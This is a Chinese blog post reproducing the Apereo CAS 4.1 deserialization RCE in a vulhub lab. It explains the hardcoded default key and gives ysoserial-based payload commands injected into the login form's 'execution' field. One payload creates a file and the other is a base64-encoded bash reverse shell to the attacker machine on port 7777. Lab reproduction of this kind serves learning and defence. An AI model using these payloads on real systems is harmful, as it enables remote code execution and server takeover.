演示视频

Apereo CAS 4.1 反序列化 RCE 漏洞_哔哩哔哩_bilibiliBGM:《芳华慢》+《霜雪千年》(by等什么君)https://www.bilibili.com/video/BV16Y411b7T8/

参考文章

https://vulhub.org/#/environments/apereo-cas/4.1-rce/

Apereo-cas 4.1 反序列化 RCE 漏洞_菜鸟的学习笔记-CSDN博客Apereo-cas 4.1 反序列化 RCE 漏洞一. 环境搭建使用vulhub提供的文件创建漏洞复现环境运行后将监听8080端口,访问http://your-ip:8080/cas/login查看登录页面。二. Exploit4.1.7 之前 Apereo CAS 的开箱即用默认配置使用默认密钥changeit:public class EncryptedTranscoder implements Transcoder { private CipherBean cipherBehttps://blog.csdn.net/qq_37043565/article/details/118293610?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164307647816780264088090%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=164307647816780264088090&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-118293610.first_rank_v2_pc_rank_v29&utm_term=Apereo+CAS+4.1+%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96+RCE+%E6%BC%8F%E6%B4%9E&spm=1018.2226.3001.4187 Apereo CAS 4.1/4.x 反序列化RCE漏洞 漏洞复现_ADummy的博客-CSDN博客_apache cas 漏洞Apereo CAS 4.1反序列化RCE漏洞by ADummy0x00利用路线​构造(可以使用ysoserial)可执行命令的序列化对象—>发送给目标61616端口—>访问web管理页面,读取消息,触发漏洞—>代码执行0x01漏洞介绍​Apereo CAS是企业级单点登录系统。CAS试图通过Apache Commons Collections库对对象进行反序列化的过程中存在一个问题,该案例引起了RCE漏洞。Apereo Cas一般是用来做身份认证的,所以有一定的攻击https://blog.csdn.net/weixin_43416469/article/details/113888749?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164307647816780264088090%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=164307647816780264088090&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-2-113888749.first_rank_v2_pc_rank_v29&utm_term=Apereo+CAS+4.1+%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96+RCE+%E6%BC%8F%E6%B4%9E&spm=1018.2226.3001.4187

Apereo CAS 4.1 反序列化命令执行漏洞复现_锋刃科技的博客-CSDN博客_apereo cas漏洞漏洞概述Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。影响版本 Apereo CAS <= 4.1.7环境搭建这里我使用vulhub来安装环境进入目录并安装启动一个Apereo CAS 4.1.5:cd vulhub-master/apereo-cas/4.1-rce/...https://blog.csdn.net/xuandao_ahfengren/article/details/111159308?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164307647816780264096434%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164307647816780264096434&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-4-111159308.first_rank_v2_pc_rank_v29&utm_term=Apereo+CAS+4.1+%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96+RCE+%E6%BC%8F%E6%B4%9E&spm=1018.2226.3001.4187

什么是Apereo CAS

Apereo CAS 是一款Apereo发布的集中认证服务平台,常被用于企业单点登录系统。

Apereo CAS 4.1 反序列化 RCE 漏洞原理

CAS 尝试通过 Apache Commons Collections 库反序列化对象时存在问题,该库导致了 RCE 漏洞。4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞(硬编码导致的漏洞),进而执行任意命令。

该漏洞影响的Apereo CAS版本

版本不大于4.1.7

漏洞利用限制

版本不大于4.1.7

漏洞复现

靶机IP:192.168.192.135

攻击机IP:192.168.192.141

 靶场搭建:docker-compose+vulhub ,可以看到靶场运行在8080端口

攻击机查看靶场环境,靶机IP:8080/cas/login

 

使用apereo-cas-attack-1.0-SNAPSHOT-all.jar生成加密的ysoserial的序列化对象

payload

1.执行命令在/root目录新建success目录

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /root/success"

在登录页面提交表单时,使用burpsuite抓包,并把提交数据中的execution字段的值替换为生成的payload,然后发包。可以看到在靶机的/root目录中新建了success目录,命令执行成功

 

 2.接下来把执行的payload换成反弹shell命令,并使用base64编码绕过java机制

​java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5Mi4xNDEvNzc3NyAwPiYxIA==}|{base64,-d}|{bash,-i}"

然后抓包,改包,发包(和之前操作一样),并在攻击机上使用nc监听反弹shell的端口 

可以看到shell反弹到攻击机的7777端口 ,由此该漏洞复现成功

写在最后的话

第一次复现漏洞,参考了很多篇相关的文章才完成,若有任何错误或失误的地方,请各位指正

Apereo CAS 4.1 反序列化 RCE 漏洞复现实验报告相关推荐

  1. 【vulhub】Apereo CAS 4.1 反序列化命令执行漏洞复现

    楼主困了,这里就直接写上楼主自己的一些操作 详细过程可以看Apereo CAS 4.1 反序列化命令执行漏洞复现 特征: 1.网站根目录下有cas目录 2.如图所示,有apereo CAS图标 3.如 ...

  2. 03 - vulhub - Apereo CAS 4.1 反序列化命令执行漏洞

    文章目录 漏洞名称:Apereo CAS 4.1 反序列化命令执行漏洞 影响版本 漏洞原理 漏洞复现 环境准备 漏洞检测 漏洞利用 验证漏洞利用是否成功 修复建议 漏洞名称:Apereo CAS 4. ...

  3. fastjson jar包_Fastjsonlt;=1.2.47反序列化RCE漏洞(CNVD201922238)

    Fastjson <=1.2.47反序列化RCE漏洞(CNVD‐2019‐22238) 一.漏洞描述 Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 ...

  4. rmi反序列化导致rce漏洞修复_企业安全05-Fastjson =1.2.47反序列化RCE漏洞(CNVD-2019-22238)...

    Fastjson <=1.2.47反序列化RCE漏洞(CNVD-2019-22238) 一.漏洞描述 Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 ...

  5. 用友php漏洞,用友GRP-u8 注入-RCE漏洞复现

    用友GRP-u8 注入-RCE漏洞复现 (HW第一时间复现了,当时觉得不合适,现在才发出来) 一.漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导 ...

  6. x友GRP-u8 注入-RCE漏洞复现

    用友GRP-u8 注入-RCE漏洞复现 一.漏洞简介 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件. 二.漏洞复现 SQL注入POC ...

  7. CVE-2019-15107 webmin RCE漏洞复现

    今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-15107 webadmin RCE漏洞复现. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成 ...

  8. thinkphp 5.0.23 rce漏洞复现

    thinkphp 5.0.23 rce漏洞复现 thinkphp介绍 thinkphp是一个快速.兼容而且简单的轻量级国产php开发框架,支持windows/Unix/linux等服务器环境,并且有相 ...

  9. 禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记

    禅道全版本rce漏洞复现笔记 漏洞说明 禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理.项目管理.测试管理于一体,同时还包含了事务管理.组织管理等诸多功能,是中小 ...

最新文章

  1. 最喜欢的 jQuery 插件
  2. sudo: unable to resolve host ubuntu提示的解决
  3. 【教程】怎么同时同时ping1000个IP地址?
  4. [探索] 利用promise做一个请求锁
  5. LeetCode(1089)——复写零(JavaScript)
  6. lombak-插件使用
  7. myeclipse 保存失败
  8. POJ1064 Cable master 【二分找最大值】
  9. SuperMap 办公自动化服务平台
  10. Python 学习小记
  11. 服务器的ftp数据库信息,服务器ftp及数据库账号
  12. 双击运行 jar 文件
  13. 苹果的产品开发流程介绍:带你认识世界最好的设计公司
  14. C++多线程同步效率对比之临界区和原子锁
  15. 【rmzt:进击的巨人三笠帅气主题】
  16. 【greenplum】 获取表结构,实现类似mysql show create table 功能
  17. 如何阅读《深入理解计算机系统》
  18. 文储研习社第11期 | DAO的前世今生
  19. 2019届寒假作业整理
  20. 移动端H5页面生成图片解决方案 1

热门文章

  1. (6)Software Pack:生成MDK软件包(包内容介绍和PDSC文件介绍)
  2. Linux系统之信号及处理流程(图详解)
  3. 小小勇者服务器维护,小小勇者超详细技巧总汇 新手必备心得一览[多图]
  4. 仿人人网java_Android仿人人客户端(v5.7.1)——个人主页(三)
  5. FPGA图像处理——YCbCr灰度转换
  6. http抓包分析技巧总结
  7. VC/MFC DDX和DDV机制介绍
  8. Java二进制文件读写与bmp位图格式学习
  9. 修复airdisk上微力同步功能拒绝访问的问题
  10. mapreduceyarn的工作机制----吸星大法